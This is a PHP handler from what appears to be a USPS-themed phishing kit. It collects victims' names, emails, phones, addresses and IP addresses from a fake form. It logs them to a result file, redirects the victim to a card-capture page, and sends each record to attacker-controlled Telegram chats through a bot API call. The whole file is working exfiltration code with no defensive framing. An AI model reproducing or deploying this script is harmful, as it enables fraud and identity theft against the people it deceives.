<?php 
extract($_REQUEST);
include "../id.php";
$F=$_POST["firstName"];
$FF=$_POST["lastName"];
$L=$_POST['State'];
$PH=$_POST["phone"];
$C=$_POST['emailAddress'];
$A1=$_POST["addressLineOne"];
$EE=$_POST['mail'];
$CI=$_POST["city"];
$S=$_POST['address_State'];
$P=$_POST['zipCode'];
$ipp=$_SERVER['REMOTE_ADDR'];
$message=">>>>>>>>>>>>>|💵| USPS |💵|<<<<<<<<<<<<"."\n"."Email address :   ".$C."\n"."Full name :  ".$F." ".$FF."\n"."State :   ".$L."\n"."Address 1 :   ".$A1."\n"."City :   ".$CI."\n"."ZIP Code :   ".$P."\n"."Phone number :   ".$PH."\n"."IP :  ".$ipp."\n".">>>>>>>>>>>>>|💳| USPS |💳|<<<<<<<<<<<<";
$user_ids=$id;
$filee=fopen("../result.txt",'a');
fwrite($filee,$message."\n");
fclose($filee);
header("location: cc.php");
foreach($user_ids as $user_id) {
$url='https://api.telegram.org/bot'.$token.'/sendMessage';
$data=array('chat_id'=>$user_id,'text'=>$message);
$options=array('http'=>array('method'=>'POST','header'=>"Content-Type:application/x-www-form-urlencoded\r\n",'content'=>http_build_query($data),),);
$context=stream_context_create($options);
$result=file_get_contents($url,false,$context);
include "../anti/antiproxy1.php";
}
?>